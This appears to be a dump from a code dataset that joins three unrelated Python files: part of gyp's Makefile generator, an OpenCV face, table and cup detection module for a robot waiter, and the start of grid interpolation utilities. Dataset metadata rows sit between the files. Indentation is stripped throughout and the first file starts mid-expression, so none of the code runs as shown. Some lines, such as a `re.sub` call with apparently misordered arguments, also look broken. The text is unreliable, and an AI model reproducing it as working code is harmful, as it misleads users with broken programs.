"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('mm') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE)) "
"$(CFLAGS_OBJCC_$(BUILDTYPE))")
self.WritePchTargets(precompiled_header.GetPchBuildCommands())
# If there are any object files in our input file list, link them into our
# output.
extra_link_deps += [source for source in sources if Linkable(source)]
self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, inpt in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, inpt))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
if self.flavor == 'aix':
target_ext = '.a'
else:
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print(("ERROR: What output file should be generated?",
"type", self.type, "target", target))
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in ('static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self):
"""Return the 'output' (full output path) to the binary in a bundle."""
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetExecutablePath())
@staticmethod
def ComputeDeps(spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
# TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
# This hack makes it work:
# link_deps.extend(spec.get('libraries', []))
return gyp.common.uniquer(deps), gyp.common.uniquer(link_deps)
def WriteDependencyOnExtraOutputs(self, extra_outputs):
self.WriteMakeRule([self.output_binary], extra_outputs, comment='Build our special outputs first.', order_only=True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps, extra_outputs, part_of_all):
"""
Write Makefile code to produce the final target of the gyp spec.
spec: input from gyp.
configs: input from gyp.
deps: dependency lists; see ComputeDeps()
link_deps: dependency lists; see ComputeDeps()
extra_outputs: any extra outputs that our target should depend on
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Rules for final target.')
if extra_outputs:
self.WriteDependencyOnExtraOutputs(extra_outputs)
self.WriteMakeRule(extra_outputs, deps, comment='Preserve order dependency of special output on deps.', order_only=True)
target_postbuilds = {}
if self.type != 'none':
for configname in sorted(configs.keys()):
config = configs[configname]
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(configname,
generator_default_variables['PRODUCT_DIR'],
lambda p: Sourceify(self.Absolutify(p)))
# TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
gyp_to_build = gyp.common.InvertRelativePath(self.path)
target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
configname,
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output))),
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output_binary))))
if target_postbuild:
target_postbuilds[configname] = target_postbuild
else:
ldflags = config.get('ldflags', [])
# Compute an rpath for this output if needed.
if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
# We want to get the literal string "$ORIGIN" into the link command,
# so we need lots of escaping.
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
self.toolset)
library_dirs = config.get('library_dirs', [])
ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
if self.flavor == 'mac':
self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
'LIBTOOLFLAGS_%s' % configname)
libraries = spec.get('libraries')
if libraries:
# Remove duplicate entries
libraries = gyp.common.uniquer(libraries)
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries)
self.WriteList(libraries, 'LIBS')
self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))
if self.flavor == 'mac':
self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
# Postbuild actions. Like actions, but implicitly depend on the target's
# output.
postbuilds = []
if self.flavor == 'mac':
if target_postbuilds:
postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
postbuilds.extend(gyp.xcode_emulation.GetSpecPostbuildCommands(spec))
if postbuilds:
# Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
# so we must output its definition first, since we declare variables
# using ":=".
self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())
for configname in target_postbuilds:
self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' % (QuoteSpaces(self.output), configname, gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
for i, postbuild in enumerate(postbuilds):
if not postbuild.startswith('$'):
postbuilds[i] = EscapeShellArgument(postbuild)
self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
self.WriteLn('%s: POSTBUILDS := %s' % (
QuoteSpaces(self.output), ' '.join(postbuilds)))
# A bundle directory depends on its dependencies such as bundle resources
# and bundle binary. When all dependencies have been built, the bundle
# needs to be packaged.
if self.is_mac_bundle:
# If the framework doesn't contain a binary, then nothing depends
# on the actions -- make the framework depend on them directly too.
self.WriteDependencyOnExtraOutputs(extra_outputs)
# Bundle dependencies. Note that the code below adds actions to this
# target, so if you move these two lines, move the lines below as well.
self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))
# After the framework is built, package it. Needs to happen before
# postbuilds, since postbuilds depend on this.
if self.type in ('shared_library', 'loadable_module'):
self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' % self.xcode_settings.GetFrameworkVersion())
# Bundle postbuilds can depend on the whole bundle, so run them after
# the bundle is packaged, not already after the bundle binary is done.
if postbuilds:
self.WriteLn('\t@$(call do_postbuilds)')
postbuilds = [] # Don't write postbuilds for target's output.
# Needed by test/mac/gyptest-rebuild.py.
self.WriteLn('\t@true # No-op, used by tests')
# Since this target depends on binary and resources which are in
# nested subfolders, the framework directory will be older than
# its dependencies usually. To prevent this rule from executing
# on every build (expensive, especially with postbuilds), expliclity
# update the time on the framework directory.
self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))
if postbuilds:
assert not self.is_mac_bundle, ('Postbuilds for bundles should be done on the bundle, not the binary (target \'%s\')' % self.target)
assert 'product_dir' not in spec, 'Postbuilds do not work with custom product_dir'
if self.type == 'executable':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'link_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all, postbuilds=postbuilds)
elif self.type == 'static_library':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in alink input filenames not supported (%s)" % link_dep)
if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
self.is_standalone_static_library):
self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all, postbuilds=postbuilds)
elif self.type == 'shared_library':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all, postbuilds=postbuilds)
elif self.type == 'loadable_module':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in module input filenames not supported (%s)" % link_dep)
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module', part_of_all, postbuilds=postbuilds)
elif self.type == 'none':
# Write a stamp line.
self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all, postbuilds=postbuilds)
else:
print("WARNING: no output for", self.type, self.target)
# Add an alias for each target (if there are any outputs).
# Installable target aliases are created below.
if ((self.output and self.output != self.target) and
(self.type not in self._INSTALLABLE_TARGETS)):
self.WriteMakeRule([self.target], [self.output], comment='Add target alias', phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [self.target], comment='Add target alias to "all" target.', phony=True)
# Add special-case rules for our installable targets.
# 1) They need to install to the build dir or "product" dir.
# 2) They get shortcuts for building (e.g. "make chrome").
# 3) They are part of "make all".
if (self.type in self._INSTALLABLE_TARGETS or
self.is_standalone_static_library):
if self.type == 'shared_library':
file_desc = 'shared library'
elif self.type == 'static_library':
file_desc = 'static library'
else:
file_desc = 'executable'
install_path = self._InstallableTargetInstallPath()
installable_deps = [self.output]
if (self.flavor == 'mac' and not 'product_dir' in spec and
self.toolset == 'target'):
# On mac, products are created in install_path immediately.
assert install_path == self.output, '%s != %s' % (install_path, self.output)
# Point the target alias to the final binary output.
self.WriteMakeRule([self.target], [install_path],
comment='Add target alias', phony=True)
if install_path != self.output:
assert not self.is_mac_bundle # See comment a few lines above.
self.WriteDoCmd([install_path], [self.output], 'copy', comment='Copy this to the %s output path.' % file_desc, part_of_all=part_of_all)
installable_deps.append(install_path)
if self.output != self.alias and self.alias != self.target:
self.WriteMakeRule([self.alias], installable_deps, comment='Short alias for building this %s.' % file_desc, phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [install_path], comment='Add %s to "all" target.' % file_desc, phony=True)
def WriteList(self, value_list, variable=None, prefix='', quoter=QuoteIfNecessary):
"""
Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
# TODO(refack) `part_of_all` is not used, but is part of signature used in many other places
# noinspection PyUnusedLocal
def WriteDoCmd(self, outputs, inputs, command, part_of_all=False, comment=None, postbuilds=None):
"""
Write a Makefile rule that uses do_cmd.
This makes the outputs dependent on the command line that was run,
as well as support the V= make command line flag.
"""
suffix = ''
if postbuilds:
assert ',' not in command
suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS
self.WriteMakeRule(
outputs,
inputs,
actions=['$(call do_cmd,%s%s)' % (command, suffix)],
comment=comment,
command=command,
force=True
)
# Add our outputs to the list of targets we read depfiles from.
# all_deps is only used for deps file reading, and for deps files we replace
# spaces with ? because escaping doesn't work with make's $(sort) and
# other functions.
outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs]
self.WriteLn('all_deps += %s' % ' '.join(outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None, order_only=False, force=False, phony=False, command=None):
"""
Write a Makefile rule, with some extra tricks.
outputs: a list of outputs for the rule (note: this is not directly
supported by make; see comments below)
inputs: a list of inputs for the rule
actions: a list of shell commands to run for the rule
comment: a comment to put in the Makefile above the rule (also useful
for making this Python script's code self-documenting)
order_only: if true, makes the dependency order-only
force: if true, include FORCE_DO_CMD as an order-only dep
phony: if true, the rule does not actually generate the named output, the
output is just a name to run the rule
command: (optional) command name to generate unambiguous labels
"""
outputs = [QuoteSpaces(o) for o in outputs]
inputs = map(QuoteSpaces, inputs)
if comment:
self.WriteLn('# ' + comment)
if phony:
self.WriteLn('.PHONY: ' + ' '.join(outputs))
if actions:
self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
force_append = ' FORCE_DO_CMD' if force else ''
if order_only:
# Order only rule: Just write a simple rule.
# TODO(evanm): just make order_only a list of deps instead of this hack.
self.WriteLn('%s: | %s%s' % (' '.join(outputs), ' '.join(inputs), force_append))
elif len(outputs) == 1:
# Regular rule, one output: Just write a simple rule.
self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
else:
# Regular rule, more than one output: Multiple outputs are tricky in make. We will write three rules:
# - All outputs depend on an intermediate file.
# - Make .INTERMEDIATE depend on the intermediate.
# - The intermediate file depends on the inputs and executes the actual command.
# - The intermediate recipe will 'touch' the intermediate file.
# - The multi-output rule will have a do-nothing recipe.
# Hash the target name to avoid generating overlong filenames.
key = (command if command else self.target).encode('utf-8')
slug = re.sub(r'\w', key, '')
cmddigest = hashlib.sha1(key).hexdigest()
intermediate = "%s.%s.intermediate" % (cmddigest, slug)
self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
self.WriteLn('\t%s' % '@:')
self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
self.WriteLn('%s: %s%s' % (intermediate, ' '.join(inputs), force_append))
actions.insert(0, '$(call do_cmd,touch)')
if actions:
for action in actions:
self.WriteLn('\t%s' % action)
self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
"""Write a set of LOCAL_XXX definitions for Android NDK.
These variable definitions will be used by Android NDK but do nothing for
non-Android applications.
Arguments:
module_name: Android NDK module name, which must be unique among all
module names.
all_sources: A list of source files (will be filtered by Compilable).
link_deps: A list of link dependencies, which must be sorted in
the order from dependencies to dependents.
"""
if self.type not in ('executable', 'shared_library', 'static_library'):
return
self.WriteLn('# Variable definitions for Android applications')
self.WriteLn('include $(CLEAR_VARS)')
self.WriteLn('LOCAL_MODULE := ' + module_name)
self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
'$(DEFS_$(BUILDTYPE)) '
# LOCAL_CFLAGS is applied to both of C and C++. There is
# no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
# sources.
'$(CFLAGS_C_$(BUILDTYPE)) '
# $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
# LOCAL_C_INCLUDES does not expect it. So put it in
# LOCAL_CFLAGS.
'$(INCS_$(BUILDTYPE))')
# LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
self.WriteLn('LOCAL_C_INCLUDES :=')
self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')
# Detect the C++ extension.
cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
default_cpp_ext = '.cpp'
for filename in all_sources:
ext = os.path.splitext(filename)[1]
if ext in cpp_ext:
cpp_ext[ext] += 1
if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
default_cpp_ext = ext
self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)
self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
'LOCAL_SRC_FILES')
# Filter out those which do not match prefix and suffix and produce
# the resulting list without prefix and suffix.
def DepsToModules(deps, prefix, suffix):
modules = []
for filepath in deps:
mod_filename = os.path.basename(filepath)
if mod_filename.startswith(prefix) and mod_filename.endswith(suffix):
modules.append(mod_filename[len(prefix):-len(suffix)])
return modules
# Retrieve the default value of 'SHARED_LIB_SUFFIX'
params = {'flavor': 'linux'}
default_variables = {}
CalculateVariables(default_variables, params)
self.WriteList(
DepsToModules(link_deps, generator_default_variables['SHARED_LIB_PREFIX'], default_variables['SHARED_LIB_SUFFIX']),
'LOCAL_SHARED_LIBRARIES')
self.WriteList(
DepsToModules(link_deps, generator_default_variables['STATIC_LIB_PREFIX'], generator_default_variables['STATIC_LIB_SUFFIX']),
'LOCAL_STATIC_LIBRARIES')
if self.type == 'executable':
self.WriteLn('include $(BUILD_EXECUTABLE)')
elif self.type == 'shared_library':
self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
elif self.type == 'static_library':
self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
self.WriteLn()
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
return gyp.xcode_emulation.GetSortedXcodeEnv(self.xcode_settings, "$(abs_builddir)", os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)", additional_settings)
def GetSortedXcodePostbuildEnv(self):
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting('CHROMIUM_STRIP_SAVE_FILE', '')
# Even if strip_save_file is empty, explicitly write it. Else a postbuild
# might pick up an export from an earlier target.
return self.GetSortedXcodeEnv(additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
for k, v in env:
# For
# foo := a\ b
# the escaped space does the right thing. For
# export foo := a\ b
# it does not -- the backslash is written to the env as literal character.
# So don't escape spaces in |env[k]|.
self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v))
def Objectify(self, path):
"""Convert a path to its output directory form."""
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset)
if not '$(obj)' in path:
path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path)
return path
def Pchify(self, path, lang):
"""Convert a prefix header path to its output directory form."""
path = self.Absolutify(path)
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' %
(self.toolset, lang))
return path
return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path)
def Absolutify(self, path):
"""Convert a subdirectory-relative path into a base-relative path.
Skips over paths that contain variables."""
if '$(' in path:
# Don't call normpath in this case, as it might collapse the
# path too aggressively if it features '..'. However it's still
# important to strip trailing slashes.
return path.rstrip('/')
return os.path.normpath(os.path.join(self.path, path))
@staticmethod
def ExpandInputRoot(template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return path
def _InstallableTargetInstallPath(self):
"""Returns the location of the final output for an installable target."""
# Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
# rely on this. Emulate this behavior for mac.
if (self.type == 'shared_library' and
(self.flavor != 'mac' or self.toolset != 'target')):
# Install all shared libs into a common directory (per toolset) for
# convenient access with LD_LIBRARY_PATH.
return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
return '$(builddir)/' + self.alias
| apache-2.0 | 6,971,785,228,950,044,000 | 42.240822 | 167 | 0.633817 | false | 3.852302 | true | false | false |
rolisz/walter_waiter | sensors/webcam.py | 1 | 7932 | import numpy as np
import itertools
import cv2
from time import sleep
import os
import math
import event
from color_matcher import ColorMatcher
from sensors.sift_matcher import SIFTMatcher
from pixels2coords import pixels2coords, get_distance_from_cup_width
def distance_between_faces(face1, face2):
x1, y1, w1, h1 = face1
x2, y2, w2, h2 = face2
return math.sqrt((x1 + w1/2.0 - x2 - w2/2.0)**2 +
(y1 + h1/2.0 - y2 - h2/2.0)**2)
def distance_to_center(face, size=(640, 480)):
"""
Get the distance from the center of the faces bounding box to the center of
the image.
>>> distance_to_center((270, 200, 20, 20))
50.0
>>> distance_to_center((310, 230, 20, 20))
0.0
>>> distance_to_center((310, 230, 20, 20), (1024, 768))
240.0
"""
x, y, w, h = face
c_x, c_y = x+w/2.0, y+h/2.0
return math.sqrt((c_x - size[0]/2.0)**2+(c_y - size[1]/2.0)**2)
def common_area(face1, face2):
"""
Calculate the percentage of common area for two bounding boxes. Should be 0
for completely different bounding boxes, 1 for the same.
>>> common_area((100, 200, 300, 400), (100, 200, 300, 400))
1.0
>>> common_area((1, 2, 3, 4), (6, 7, 8, 9))
0.0
>>> common_area((100, 100, 100, 100), (150, 100, 100, 100))
0.5
>>> round(common_area((100, 100, 100, 100), (150, 100, 100, 200)), 4)
0.3333
"""
area = (face1[2]*face1[3] + face2[2]*face2[3])/2.0
left = max(face1[0], face2[0])
right = min(face1[0] + face1[2], face2[0]+face2[2])
top = max(face1[1], face2[1])
bottom = min(face1[1]+face1[3], face2[1]+face2[3])
if left < right and top < bottom:
return (right - left)*(bottom-top)/area
return 0.0
class Webcam(event.EventEmitter):
def __init__(self, ev, cam):
self.cap = cv2.VideoCapture(cam)
self.cap.set(3, 1280)
self.cap.set(4, 720)
super(Webcam, self).__init__(ev)
def run(self):
while self.run_flag.is_set():
_, frame = self.cap.read()
self.emit('frame', frame)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
sleep(0.1)
cv2.destroyAllWindows()
self.cap.release()
MAX_ITER = 15
class FaceDetector(event.DecisionMaker):
def __init__(self, ev):
self.i = MAX_ITER
# If this script doesn't work, first check if the paths to the Haar
# cascades are correct. By default they work on my computer.
# On other computers they can be overwritten by setting the env
# variables FACE_HAAR and PROFILE_HAAR to the appropiate values.
#
self.face = None
self.face_cascade = cv2.CascadeClassifier(os.getenv('FACE_HAAR',
'haarcascades/haarcascade_frontalface_default.xml'
))
self.profile_cascade = cv2.CascadeClassifier(os.getenv('PROFILE_HAAR',
"haarcascades/haarcascade_profileface.xml"
))
super(FaceDetector, self).__init__(ev)
def frame(self, frame):
frame = cv2.resize(frame, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = list(self.face_cascade.detectMultiScale(gray, 1.3, 5))
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
if len(faces):
distances = sorted([(face, distance_to_center(face,
(1280, 1024))) for face in faces],
key=lambda x: x[0][2]*x[0][3]) # Area of face
if self.face is None:
self.face, self.d_c = distances[-1]
else:
distances.sort(key=lambda x: distance_between_faces(x[0],
self.face))
if distance_between_faces(self.face, distances[0][0]) < 50:
self.face, self.d_c = distances[0]
else:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
self.sleep(0)
cv2.imshow('faces', frame)
return
self.emit('face_pos', tuple(x*2 for x in self.face))
x, y, w, h = self.face
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow('faces', frame)
self.i = MAX_ITER
elif self.face is not None:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
cv2.imshow('faces', frame)
self.sleep(0)
class TableDetector(event.DecisionMaker):
def __init__(self, ev):
self.ev = ev
self.table_matcher = SIFTMatcher(templ='haarcascades/table.png', min_match_count=20)
super(TableDetector, self).__init__(ev)
def frame(self, frame):
height, width = frame.shape[:2]
frame = cv2.resize(frame, (3*width/4, 3*height/4))
result = self.table_matcher.find_match(frame)
if result is not None:
kp2, matchesMask, dst, good, dst_pts = result
else:
cv2.imshow('frame', frame)
self.sleep(0)
return
frame = cv2.polylines(frame,[np.int32(dst)],True, 255)
cv2.imshow('Table detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
self.emit('table_pos', dst)
self.sleep(0)
class CupDetector(event.DecisionMaker):
def __init__(self, ev, cam_angle, cup_color='pahar_mare_albastru'):
self.frames_seen = 0
self.cam_angle = cam_angle
self.cup_color = cup_color
self.blue_cup = ColorMatcher(cup_color)
self.ev = ev
super(CupDetector, self).__init__(ev)
def frame(self, frame):
big_contours = self.blue_cup.find_bboxes(frame)
contours = []
for contour in big_contours:
x, y, X, Y = contour
ratio = float(Y-y)/(X-x+1)
contours.append((x, y, X, Y, 1, 1.2))
for x, y, X, Y in big_contours:
ratio = float(Y-y)/(X-x+1)
cv2.rectangle(frame, (x-2, y-2), (X, Y), (255, 0, 0), 2)
cv2.putText(frame, '%0.3f' % ratio, (x, y+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
coords_list = []
for x, y, X, Y, matches, ratio in contours:
cv2.rectangle(frame, (x - 2, y - 2), (X, Y), (0, 255, 0), 2)
dist = '%0.2f' % get_distance_from_cup_width(X-x)
coords = pixels2coords((x+X)/2., Y-(X-x), X-x,
cam_angle=self.cam_angle)
cv2.putText(frame, dist, (x, y-20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
cv2.putText(frame, '%0.2f %0.2f %0.2f' % coords, (x, y-50),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255),
thickness=2)
if x > 0 and X < frame.shape[1]:
coords_list.append(coords)
coords_list.sort()
for x, y, z in coords_list:
self.frames_seen = min(self.frames_seen + 1, 20)
if self.frames_seen == 20 and x < 400:
print 'cd: Cup appeared: %s' % self.cup_color
self.emit('cup_appeared', (x, y, z))
self.frames_seen = 0
break
#else:
#print 'cd: Cups done: %s' % self.cup_color
#self.emit('cups_done')
cv2.imshow('Cup detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
| mit | -6,352,059,488,724,073,000 | 34.253333 | 92 | 0.51122 | false | 3.25082 | false | false | false |
dionhaefner/veros | veros/tools/setup.py | 1 | 17459 | import numpy as np
import scipy.interpolate
import scipy.spatial
def interpolate(coords, var, interp_coords, missing_value=None, fill=True, kind='linear'):
"""Interpolate globally defined data to a different (regular) grid.
Arguments:
coords: Tuple of coordinate arrays for each dimension.
var (:obj:`ndarray` of dim (nx1, ..., nxd)): Variable data to interpolate.
interp_coords: Tuple of coordinate arrays to interpolate to.
missing_value (optional): Value denoting cells of missing data in ``var``.
Is replaced by `NaN` before interpolating. Defaults to `None`, which means
no replacement is taking place.
fill (bool, optional): Whether `NaN` values should be replaced by the nearest
finite value after interpolating. Defaults to ``True``.
kind (str, optional): Order of interpolation. Supported are `nearest` and
`linear` (default).
Returns:
:obj:`ndarray` containing the interpolated values on the grid spanned by
``interp_coords``.
"""
if len(coords) != len(interp_coords) or len(coords) != var.ndim:
raise ValueError('Dimensions of coordinates and values do not match')
var = np.array(var)
if missing_value is not None:
invalid_mask = np.isclose(var, missing_value)
var[invalid_mask] = np.nan
if var.ndim > 1 and coords[0].ndim == 1:
interp_grid = np.rollaxis(np.array(np.meshgrid(
*interp_coords, indexing='ij', copy=False)), 0, len(interp_coords) + 1)
else:
interp_grid = coords
var = scipy.interpolate.interpn(coords, var, interp_grid,
bounds_error=False, fill_value=np.nan, method=kind)
if fill:
var = fill_holes(var)
return var
def fill_holes(data):
"""A simple inpainting function that replaces NaN values in `data` with the
nearest finite value.
"""
data = data.copy()
shape = data.shape
dim = data.ndim
flag = np.zeros(shape, dtype=bool)
flag[~np.isnan(data)] = True
slcs = [slice(None)] * dim
while np.any(~flag):
for i in range(dim):
slcs1 = slcs[:]
slcs2 = slcs[:]
slcs1[i] = slice(0, -1)
slcs2[i] = slice(1, None)
slcs1 = tuple(slcs1)
slcs2 = tuple(slcs2)
# replace from the right
repmask = np.logical_and(~flag[slcs1], flag[slcs2])
data[slcs1][repmask] = data[slcs2][repmask]
flag[slcs1][repmask] = True
# replace from the left
repmask = np.logical_and(~flag[slcs2], flag[slcs1])
